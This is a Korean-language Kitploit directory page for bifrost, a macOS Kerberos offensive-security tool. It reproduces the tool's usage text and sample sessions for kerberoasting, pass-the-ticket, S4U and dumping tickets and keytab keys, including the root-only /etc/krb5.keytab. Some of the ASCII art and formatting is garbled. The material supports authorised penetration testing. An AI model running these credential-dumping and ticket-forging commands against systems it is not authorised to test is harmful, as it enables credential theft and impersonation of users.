Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
bifrost — macOS Kerberos의 Heimdal API와 상호작용하기 위한 Objective-C 라이브러리 및 콘솔 | Kitploit
도구/GitHubGitHub/its-a-feature/bifrost
Password AttacksExploitationPenetration TestingAuthenticationRed Teaming
GitHubits-a-feature/bifrost

bifrost

macOS Kerberos의 Heimdal API와 상호작용하기 위한 Objective-C 라이브러리 및 콘솔

저장소 보기
1581993년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Bifrost```


( \ _ /'___) ( )_ | (_) )(_)| (__ _ __ _ ___ | ,_) | _ <'| || ,__)( '__)/'_\ /',__)| |
| (
) )| || | | | ( () )_, | |_ (__/'()() () \___/'(____/_)

Usage: ./bifrost -action [dump | list | askhash | describe | asktgt | asktgs | s4u | ptt | remove] For dump action: -source [tickets | keytab] for keytab, optional -path to specify a keytab for tickets, optional -name to specify a ccache entry to dump For list action: no other options are necessary For askhash action: -username a.test -password 'mypassword' -domain DOMAIN.COM optionally specify -enctype [aes256 | aes128 | rc4] or get all of them optionally specify -bpassword 'base64 of password' in case there might be issues with parsing or special characters For asktgt action: -username a.test -domain DOMAIN.COM if using a plaintext password, specify -password 'password' if using a hash, specify -enctype [aes256 | aes128 | rc4] -hash [hash_here] optionally specify -tgtEnctype [aes256|aes128|rc4] to request a TGT with a specific encryption type optionally specify -supportAll false to indicate that you want a TGT to match your hash enctype, otherwise will try to get AES256 if using a keytab, specify -enctype and -keytab [keytab path] to pull a specific hash from the keytab optionally specify -tgtEnctype [aes256|aes128|rc4] to request a TGT with a specific encryption type optionally specify -supportAll false to indicate that you want a TGT to match your hash enctype, otherwise will try to get AES256 For describe action: -ticket base64KirbiTicket For asktgs action: -ticket [base64 of TGT] -service [comma separated list of SPNs] optionally specify -connectDomain to connect to a domain other than the one specified in the ticket optionally specify -serviceDomain to request a service ticket in a domain other than the one specified in the ticket optionally specify -kerberoast true to indicate a request for rc4 instead of aes256 For s4u: -ticket [base64 of TGT] -targetUser [target user in current domain, or targetuser@domain for a different domain] -spn [target SPN] (if this isn't specified, just a forwardable S4U2Self ticket is requested as targetUser) optionally specify -connectDomain [domain or host to connect to] For ptt: -ticket [base64 of kirbi ticket] optionally specify -name [name] to import the ticket into a specific credential cache optionally specify -name new to import the ticket into a new credential cache For remove: for tickets: -source tickets -name [name here] (removes an entire ccache) for keytabs: -source keytab -principal [principal name] (removes all entries for that principal) for keytabs: optionally specify -name to not use the default keytab you can't remove a specific ccache principal entry since it seems to not be implemented in heimdal

# 목차
- [개요](#overview)
- 명령어
    - [list](#list)
    - [dump](#dump)  
        - [티켓](#tickets)  
        - [keytab](#keytab)  
    - [askhash](#askhash)  
    - [asktgt](#asktgt)
        - [평문 비밀번호 사용](#with-plaintext-password)    
        - [해시 사용](#with-hash)
        - [keytab 항목 사용](#with-keytab-entry)
    - [describe](#describe)
    - [asktgs](#asktgs)
        - [다른 도메인](#different-domains)
        - [kerberoasting](#kerberoasting)
    - [s4u](#s4u)
    - [ptt](#ptt)
    - [remove](#remove)
        - [자격 증명 캐시](#credential-cache)
        - [keytab 항목](#keytab-entry)

## 개요
Bifrost는 macOS에서 Heimdal krb5 API와 상호작용하도록 설계된 Objective-C 프로젝트입니다. Bifrost는 정적 라이브러리로 컴파일되지만(필요한 경우 dylib로 변경할 수 있음), bifrostconsole은 Bifrost 라이브러리를 사용하는 간단한 콘솔 프로젝트입니다. 이 프로젝트의 목표는 대상에 다른 프레임워크나 패키지를 요구하지 않고 네이티브 API를 사용하여 macOS 기기에서 Kerberos 관련 보안 테스트를 더 잘 수행할 수 있게 하는 것입니다.

이것은 Mac에서 컴파일되어야 하며, 테스트 목적이라 해도 모든 사람이 쉽게 사용할 수 있는 환경이 아닐 수 있기 때문에 "compiled_binaries" 폴더에 콘솔과 라이브러리의 컴파일된 버전을 포함해 두었습니다. 사전 컴파일된 것이므로 서명이 많이 적용되어 있어 개인 테스트 목적으로만 사용할 수 있을 것입니다.
## list
`-action list` 명령은 메모리의 모든 자격 증명 캐시를 반복하면서 각 캐시와 그 안의 각 항목에 대한 기본 정보를 제공합니다. 또한 기본 캐시는 `[*]` 표시로, 그 외 각 캐시는 `[+]` 표시로 식별합니다.```
spooky:~ lab_admin$ ./bifrost -action list
 ___         ___                   _     
(  _`\  _  /'___)                 ( )_  
| (_) )(_)| (__  _ __   _     ___ | ,_)  
|  _ <'| || ,__)( '__)/'_`\ /',__)| |   
| (_) )| || |   | |  ( (_) )\__, \| |_ 
(____/'(_)(_)   (_)  `\___/'(____/\__) 


[*] Principal: [email protected]
    Name: API:A74E8799-8173-4D1A-8C7D-AFD2D8B003F3
    Issued             Expires                Principal                    Flags
2019-11-13 18:00:20PST    2019-11-14 04:00:20PST    krbtgt/[email protected]    (forwardable renewable initial pre-auth )
1970-12-31 16:00:00PST    2019-12-13 18:00:21PST    krb5_ccache_conf_data/kcm-status@X-CACHECONF:    ()

dump

The -action dump command can extract information about keytabs or credential caches based on the flags.

tickets

To dump tickets specifically, use -source tickets. By default, this will only iterate through the default credential cache. The default credential cache can be identified with the -action list command and looking for the cache identified with a [*] marker. To dump a specific credential cache, use the -name [name here] flag.

Each ticket will be described and dumped into a base64 Kirbi format that can then be used for other commands or with other tools on Windows.``` spooky:~ lab_admin$ ./bifrost -action dump -source tickets


( \ _ /'___) ( )_ | (_) )(_)| (__ _ __ _ ___ | ,_) | _ <'| || ,__)( '__)/'_\ /',__)| |
| (
) )| || | | | ( () )_, | |_ (/'()() (_) `_/'(___/_)

Client: [email protected] Principal: krbtgt/LAB.[email protected] Key enctype: aes256 Key: DUpykxCguZ9JtWML38nygb5Yyhvd1nGvy+MGReD7sXU= (0D4A729310A0B99F49B5630BDFC9F281BE58CA1BDDD671AFCBE30645E0FBB175) Expires: 2019-11-14 12:00:20 GMT Flags: forwardable renewable initial pre-auth Kirbi: doIFIDCCBRygBgIEAAA<...snip...>TE9DQUw=

Client: [email protected] Principal: krb5_ccache_conf_data/kcm-status@X-CACHECONF: Key enctype: 0 Key: () Expires: 2019-12-14 02:00:21 GMT Flags: Principal type: kcm-status Ticket Data: a3JiNQAAAAEAAAAA

### keytab
keytab 키를 덤프하려면 `-source keytab` 매개변수를 사용합니다. 기본적으로 루트만 읽을 수 있는 기본 keytab(`/etc/krb5.keytab`)에서 정보를 덤프하려고 시도합니다. 다른 keytab을 지정하려면 `-path /path/to/keytab` 인수를 사용합니다.

각 keytab 항목이 설명되고 키는 base64와 hex로 덤프됩니다.```
spooky:~ lab_admin$ ./bifrost -action dump -source keytab -path test
 ___         ___                   _     
(  _`\  _  /'___)                 ( )_  
| (_) )(_)| (__  _ __   _     ___ | ,_)  
|  _ <'| || ,__)( '__)/'_`\ /',__)| |   
| (_) )| || |   | |  ( (_) )\__, \| |_ 
(____/'(_)(_)   (_)  `\___/'(____/\__) 

[*] Resolving keytab path
[+] Successfully opened keytab
[+] principal: [email protected]
    Entry version: 3
    Key enctype: aes256
    Key: 2DE49D76499F89DEA6DFA62D0EA7FEDFD108EC52936740E2450786A92616D1E1
    Timestamp: 2019-11-10 04:58:09 GMT
bash-3.2$ sudo ./bifrost -action dump -source keytab
 ___         ___                   _     
(  _`\  _  /'___)                 ( )_  
| (_) )(_)| (__  _ __   _     ___ | ,_)  
|  _ <'| || ,__)( '__)/'_`\ /',__)| |   
| (_) )| || |   | |  ( (_) )\__, \| |_ 
(____/'(_)(_)   (_)  `\___/'(____/\__)
도구 다운로드